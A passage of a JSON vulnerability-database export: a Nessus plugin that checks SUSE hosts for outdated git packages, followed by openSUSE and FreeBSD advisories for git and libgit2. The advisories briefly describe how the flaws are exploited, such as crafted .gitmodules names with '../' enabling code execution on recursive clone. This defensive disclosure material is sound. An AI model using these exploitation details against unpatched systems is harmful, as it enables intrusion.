value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-08-25T01:33:23", "description": "This update for libgit2 to version 0.26.5 fixes the following issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out\n of bound read, allowing to read the base object, which could be\n exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta\n file, which could be exploited by an attacker t ocause a denial of\n service (DoS) (bsc#1100612).\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a\n crafted .gitmodules file (bsc#1095219)\n - CVE-2018-15501: Prevent out-of-bounds reads when processing\n smart-protocol "ng" packets (bsc#1104641)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "cvss3": {}, "published": "2018-08-25T00:07:49", "type": "suse", "title": "Security update for libgit2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2018-08-25T00:07:49", "id": "OPENSUSE-SU-2018:2502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00074.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-27T02:31:29", "description": "This update for libgit2 fixes the following issues:\n\n - CVE-2018-8099: Fixed possible denial of service attack via different\n vectors by not being able to differentiate between these status codes\n (bsc#1085256).\n - CVE-2018-11235: With a crafted .gitmodules file, a malicious project can\n execute an arbitrary script on a machine that runs "git clone\n --recurse-submodules" because submodule "names" are obtained from this\n file, and then appended to $GIT_DIR/modules, leading to directory\n traversal with "../" in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in which hooks are\n not obtained from a remote server. (bsc#1095219)\n - CVE-2018-10887: It has been discovered that an unexpected sign extension\n in git_delta_apply function in delta.c file may have lead to an integer\n overflow which in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this flaw to leak\n memory addresses or cause a Denial of Service. (bsc#1100613)\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta\n file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol "ng"\n packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. (bsc#1104641)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "cvss3": {}, "published": "2018-10-27T00:24:13", "type": "suse", "title": "Security update for libgit2 (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2018-10-27T00:24:13", "id": "OPENSUSE-SU-2018:3519-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00078.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-06T04:42:39", "description": "This update for fixes the following security issues:\n\n * path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233,\n boo#1095218)\n * arbitrary code execution when recursively cloning a malicious repository\n (CVE-2018-11235, boo#1095219)\n\n", "cvss3": {}, "published": "2018-06-06T03:06:59", "type": "suse", "title": "Security update for git (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2018-06-06T03:06:59", "id": "OPENSUSE-SU-2018:1553-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00004.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-30T18:26:12", "description": "An update that solves 15 vulnerabilities and has 8 fixes is\n now available.\n\nDescription:\n\n This update for git fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2020-11008: Specially crafted URLs may have tricked the credentials\n helper to providing credential information that is not appropriate for\n the protocol in use and host being contacted (bsc#1169936)\n\n git was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd\n service (bsc#1169605).\n\n * CVE-2020-5260: Specially crafted URLs with newline characters could have\n been used to make the Git client to send credential information for a\n wrong host to the attacker's site bsc#1168930\n\n git 2.26.0 (bsc#1167890, jsc#SLE-11608):\n\n * \"git rebase\" now uses a different backend that is based on the 'merge'\n machinery by default. The 'rebase.backend' configuration variable\n reverts to old behaviour when set to 'apply'\n * Improved handling of sparse checkouts\n * Improvements to many commands and internal features\n\n git 2.25.2:\n\n * bug fixes to various subcommands in specific operations\n\n git 2.25.1:\n\n * \"git commit\" now honors advise.statusHints\n * various updates, bug fixes and documentation updates\n\n git 2.25.0\n\n * The branch description (\"git branch --edit-description\") has been used\n to fill the body of the cover letters by the format-patch command; this\n has been enhanced so that the subject can also be filled.\n * A few commands learned to take the pathspec from the standard input\n or a named file, instead of taking it as the command line arguments,\n with the \"--pathspec-from-file\" option.\n * Test updates to prepare for SHA-2 transition continues.\n * Redo \"git name-rev\" to avoid recursive calls.\n * When all files from some subdirectory were renamed to the root\n directory, the directory rename heuristics would fail to detect that as\n a rename/merge of the subdirectory to the root directory, which has been\n corrected.\n * HTTP transport had possible allocator/deallocator mismatch, which has\n been corrected.\n\n git 2.24.1:\n\n * CVE-2019-1348: The --export-marks option of fast-import is exposed also\n via the in-stream command feature export-marks=... and it allows\n overwriting arbitrary paths (bsc#1158785)\n * CVE-2019-1349: on Windows, when submodules are cloned recursively, under\n certain circumstances Git could be fooled into using the same Git\n directory twice (bsc#1158787)\n * CVE-2019-1350: Incorrect quoting of command-line arguments allowed\n remote code execution during a recursive clone in conjunction with SSH\n URLs (bsc#1158788)\n * CVE-2019-1351: on Windows mistakes drive letters outside of the\n US-English alphabet as relative paths (bsc#1158789)\n * CVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n (bsc#1158790)\n * CVE-2019-1353: when run in the Windows Subsystem for Linux while\n accessing a working directory on a regular Windows drive, none of the\n NTFS protections were active (bsc#1158791)\n * CVE-2019-1354: on Windows refuses to write tracked files with filenames\n that contain backslashes (bsc#1158792)\n * CVE-2019-1387: Recursive clones vulnerability that is caused by too-lax\n validation of submodule names, allowing very targeted attacks via remote\n code execution in recursive clones (bsc#1158793)\n * CVE-2019-19604: a recursive clone followed by a submodule update could\n execute code contained within the repository without the user explicitly\n having asked for that (bsc#1158795)\n\n git 2.24.0\n\n * The command line parser learned \"--end-of-options\" notation.\n * A mechanism to affect the default setting for a (related) group of\n configuration variables is introduced.\n * \"git fetch\" learned \"--set-upstream\" option to help those who first\n clone from their private fork they intend to push to, add the true\n upstream via \"git remote add\" and then \"git fetch\" from it.\n * fixes and improvements to UI, workflow and features, bash completion\n fixes\n\n git 2.23.0:\n\n * The \"--base\" option of \"format-patch\" computed the patch-ids for\n prerequisite patches in an unstable way, which has been updated to\n compute in a way that is compatible with \"git patch-id\n --stable\".\n * The \"git log\" command by default behaves as if the --mailmap\n option was given.\n * fixes and improvements to UI, workflow and features\n\n git 2.22.1\n\n * A relative pathname given to \"git init --template=<path> <repo>\"\n ought to be relative to the directory \"git init\" gets invoked in, but it\n instead was made relative to the repository, which has been corrected.\n * \"git worktree add\" used to fail when another worktree connected to the\n same repository was corrupt, which has been corrected.\n * \"git am -i --resolved\" segfaulted after trying to see a commit as if it\n were a tree, which has been corrected.\n * \"git merge --squash\" is designed to update the working tree and the\n index without creating the commit, and this cannot be countermanded by\n adding the \"--commit\" option; the command now refuses to work when both\n options are given.\n * Update to Unicode 12.1 width table.\n * \"git request-pull\" learned to warn when the ref we ask them to pull from\n in the local repository and in the published repository are different.\n * \"git fetch\" into a lazy clone forgot to fetch base objects that are\n necessary to complete delta in a thin packfile, which has been corrected.\n * The URL decoding code has been updated to avoid going past the end\n of the string while parsing %-<hex>-<hex> sequence.\n * \"git clean\" silently skipped a path when it cannot lstat() it; now it\n gives a warning.\n * \"git rm\" to resolve a conflicted path leaked an internal message \"needs\n merge\" before actually removing the path, which was confusing. This has\n been corrected.\n * Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2 has been replaced\n by firewalld.\n\n - partial fix for git instaweb giving 500 error (bsc#1112230)\n\n git 2.22.0\n\n * The filter specification \"--filter=sparse:path=<path>\" used to create a\n lazy/partial clone has been removed. Using a blob that is part of the\n project as sparse specification is still supported with the\n \"--filter=sparse:oid=<blob>\" option\n * \"git checkout --no-overlay\" can be used to trigger a new mode of\n checking out paths out of the tree-ish, that allows paths that match the\n pathspec that are in the current index and working tree and are not in\n the tree-ish.\n * Four new configuration variables {author,committer}.{name,email} have\n been introduced to override user.{name,email} in more specific cases.\n * \"git branch\" learned a new subcommand \"--show-current\".\n * The command line completion (in contrib/) has been taught to complete\n more subcommand parameters.\n * The completion helper code now pays attention to repository-local\n configuration (when available), which allows --list-cmds to honour a\n repository specific setting of completion.commands, for example.\n * The list of conflicted paths shown in the editor while concluding a\n conflicted merge was shown above the scissors line when the clean-up\n mode is set to \"scissors\", even though it was commented\n out just like the list of updated paths and other information to help\n the user explain the merge better.\n * \"git rebase\" that was reimplemented in C did not set ORIG_HEAD\n correctly, which has been corrected.\n * \"git worktree add\" used to do a \"find an available name with stat and\n then mkdir\", which is race-prone. This has been fixed by using mkdir and\n reacting to EEXIST in a loop.\n\n - Move to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy\n DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\n git 2.21.0\n\n * Historically, the \"-m\" (mainline) option can only be used for \"git\n cherry-pick\" and \"git revert\" when working with a merge commit. This\n version of Git no longer warns or errors out when working with a\n single-parent commit, as long as the argument to the \"-m\" option is 1\n (i.e. it has only one parent, and the request is to pick or revert\n relative to that first parent). Scripts that relied on the behaviour may\n get broken with this change.\n * Small fixes and features for fast-export and fast-import.\n * The \"http.version\" configuration variable can be used with recent enough\n versions of cURL library to force the version of HTTP used to talk when\n fetching and pushing.\n * \"git push $there $src:$dst\" rejects when $dst is not a fully qualified\n refname and it is not clear what the end user meant.\n * Update \"git multimail\" from the upstream.\n * A new date format \"--date=human\" that morphs its output depending\n on how far the time is from the current time has been introduced.\n \"--date=auto:human\" can be used to use this new format (or any existing\n format) when the output is going to the pager or to the terminal, and\n otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n - add shadow build dependency to the -daemon subpackage.\n\n\n git 2.20.1:\n\n * portability fixes\n * \"git help -a\" did not work well when an overly long alias was defined\n * no longer squelched an error message when the run_command API failed to\n run a missing command\n\n git 2.20.0\n\n * \"git help -a\" now gives verbose output (same as \"git help -av\"). Those\n who want the old output may say \"git help --no-verbose -a\"..\n * \"git send-email\" learned to grab address-looking string on any trailer\n whose name ends with \"-by\".\n * \"git format-patch\" learned new \"--interdiff\" and \"--range-diff\"\n options to explain the difference between this version and the previous\n attempt in the cover letter (or after the three-dashes as a comment).\n * Developer builds now use -Wunused-function compilation option.\n * Fix a bug in which the same path could be registered under multiple\n worktree entries if the path was missing (for instance, was removed\n manually). Also, as a convenience, expand the number of cases in which\n --force is applicable.\n * The overly large Documentation/config.txt file have been split into\n million little pieces. This potentially allows each individual piece to\n be included into the manual page of the command it affects more easily.\n * Malformed or crafted data in packstream can make our code attempt to\n read or write past the allocated buffer and abort, instead of reporting\n an error, which has been fixed.\n * Fix for a long-standing bug that leaves the index file corrupt when it\n shrinks during a partial commit.\n * \"git merge\" and \"git pull\" that merges into an unborn branch used to\n completely ignore \"--verify-signatures\", which has been corrected.\n * ...and much more features and fixes\n\n git 2.19.2:\n\n * various bug fixes for multiple subcommands and operations\n\n git 2.19.1:\n\n * CVE-2018-17456: Specially crafted .gitmodules files may have allowed\n arbitrary code execution when the repository is cloned with\n --recurse-submodules (bsc#1110949)\n\n git 2.19.0:\n\n * \"git diff\" compares the index and the working tree. For paths added\n with intent-to-add bit, the command shows the full contents\n of them as added, but the paths themselves were not marked as new\n files. They are now shown as new by default.\n * \"git apply\" learned the \"--intent-to-add\" option so that an\n otherwise working-tree-only application of a patch will add new paths to\n the index marked with the \"intent-to-add\" bit.\n * \"git grep\" learned the \"--column\" option that gives not just the line\n number but the column number of the hit.\n * The \"-l\" option in \"git branch -l\" is an unfortunate short-hand for\n \"--create-reflog\", but many users, both old and new, somehow expect it\n to be something else, perhaps \"--list\". This step warns when \"-l\" is\n used as a short-hand for \"--create-reflog\" and warns about the future\n repurposing of the it when it is used.\n * The userdiff pattern for .php has been updated.\n * The content-transfer-encoding of the message \"git send-email\" sends\n out by default was 8bit, which can cause trouble when there is an\n overlong line to bust RFC 5322/2822 limit. A new option 'auto' to\n automatically switch to quoted-printable when there is such a line in\n the payload has been introduced and is made the default.\n * \"git checkout\" and \"git worktree add\" learned to honor\n checkout.defaultRemote when auto-vivifying a local branch out of a\n remote tracking branch in a repository with multiple remotes that have\n tracking branches that share the same names. (merge 8d7b558bae\n ab/checkout-default-remote later to maint).\n * \"git grep\" learned the \"--only-matching\" option.\n * \"git rebase --rebase-merges\" mode now handles octopus merges as well.\n * Add a server-side knob to skip commits in exponential/fibbonacci stride\n in an attempt to cover wider swath of history with a smaller number of\n iterations, potentially accepting a larger packfile transfer, instead of\n going back one commit a time during common ancestor discovery during the\n \"git fetch\" transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping\n later to maint).\n * A new configuration variable core.usereplacerefs has been added,\n primarily to help server installations that want to ignore the replace\n mechanism altogether.\n * Teach \"git tag -s\" etc. a few configuration variables (gpg.format that\n can be set to \"openpgp\" or \"x509\", and gpg.<format>.program that is used\n to specify what program to use to deal with the format) to allow x.509\n certs with CMS via \"gpgsm\" to be used instead of\n openpgp via \"gnupg\".\n * Many more strings are prepared for l10n.\n * \"git p4 submit\" learns to ask its own pre-submit hook if it should\n continue with submitting.\n * The test performed at the receiving end of \"git push\" to prevent bad\n objects from entering repository can be customized via receive.fsck.*\n configuration variables; we now have gained a counterpart to do the same\n on the \"git fetch\" side, with fetch.fsck.* configuration variables.\n * \"git pull --rebase=interactive\" learned \"i\" as a short-hand for\n \"interactive\".\n * \"git instaweb\" has been adjusted to run better with newer Apache on\n RedHat based distros.\n * \"git range-diff\" is a reimplementation of \"git tbdiff\" that lets us\n compare individual patches in two iterations of a topic.\n * The sideband code learned to optionally paint selected keywords at the\n beginning of incoming lines on the receiving end.\n * \"git branch --list\" learned to take the default sort order from the\n 'branch.sort' configuration variable, just like \"git tag --list\" pays\n attention to 'tag.sort'.\n * \"git worktree\" command learned \"--quiet\" option to make it less verbose.\n\n git 2.18.0:\n\n * improvements to rename detection logic\n * When built with more recent cURL, GIT_SSL_VERSION can now specify\n \"tlsv1.3\" as its value.\n * \"git mergetools\" learned talking to guiffy.\n * various other workflow improvements and fixes\n * performance improvements and other developer visible fixes\n\n git 2.17.1\n\n * Submodule \"names\" come from the untrusted .gitmodules file, but we\n blindly append them to $GIT_DIR/modules to create our on-disk repo\n paths. This means you can do bad things by putting \"../\" into the name.\n We now enforce some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235, bsc#1095219)\n * It was possible to trick the code that sanity-checks paths on NTFS into\n reading random piece of memory (CVE-2018-11233, bsc#1095218)\n * Support on the server side to reject pushes to repositories that attempt\n to create such problematic .gitmodules file etc. as tracked contents, to\n help hosting sites protect their customers by preventing malicious\n contents from spreading.\n\n git 2.17.0:\n\n * \"diff\" family of commands learned \"--find-object=<object-id>\" option to\n limit the findings to changes that involve the named object.\n * \"git format-patch\" learned to give 72-cols to diffstat, which is\n consistent with other line length limits the subcommand uses for its\n output meant for e-mails.\n * The log from \"git daemon\" can be redirected with a new option; one\n relevant use case is to send the log to standard error (instead of\n syslog) when running it from inetd.\n * \"git rebase\" learned to take \"--allow-empty-message\" option.\n * \"git am\" has learned the \"--quit\" option, in addition to the existing\n \"--abort\" option; having the pair mirrors a few other commands like\n \"rebase\" and \"cherry-pick\".\n * \"git worktree add\" learned to run the post-checkout hook, just like \"git\n clone\" runs it upon the initial checkout.\n * \"git tag\" learned an explicit \"--edit\" option that allows the message\n given via \"-m\" and \"-F\" to be further edited.\n * \"git fetch --prune-tags\" may be used as a handy short-hand for getting\n rid of stale tags that are locally held.\n * The new \"--show-current-patch\" option gives an end-user facing way to\n get the diff being applied when \"git rebase\" (and \"git am\") stops with a\n conflict.\n * \"git add -p\" used to offer \"/\" (look for a matching hunk) as a choice,\n even there was only one hunk, which has been corrected. Also the\n single-key help is now given only for keys that are enabled (e.g. help\n for '/' won't be shown when there is only one hunk).\n * Since Git 1.7.9, \"git merge\" defaulted to --no-ff (i.e. even when the\n side branch being merged is a descendant of the current commit, create a\n merge commit instead of fast-forwarding) when merging a tag object.\n This was appropriate default for integrators who pull signed tags from\n their downstream contributors, but caused an unnecessary merges when\n used by downstream contributors who habitually \"catch up\" their topic\n branches with tagged releases from the upstream. Update \"git merge\" to\n default to --no-ff only when merging a tag object that does *not* sit at\n its usual place in refs/tags/ hierarchy, and allow fast-forwarding\n otherwise, to mitigate the problem.\n * \"git status\" can spend a lot of cycles to compute the relation between\n the current branch and its upstream, which can now be disabled with\n \"--no-ahead-behind\" option.\n * \"git diff\" and friends learned funcname patterns for Go language source\n files.\n * \"git send-email\" learned \"--reply-to=<address>\" option.\n * Funcname pattern used for C# now recognizes \"async\" keyword.\n * In a way similar to how \"git tag\" learned to honor the pager setting\n only in the list mode, \"git config\" learned to ignore the pager setting\n when it is used for setting values (i.e. when the purpose of the\n operation is not to \"show\").\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-598=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "suse", "title": "Security update for git (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2020-05-01T00:00:00", "id": "OPENSUSE-SU-2020:0598-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VP5YOKSRLMTVAPQKPHEDGCOIZL5JKJW5/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nOut-of-bounds reads when reading objects from a packfile\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-07-09T00:00:00", "type": "freebsd", "title": "Libgit2 -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 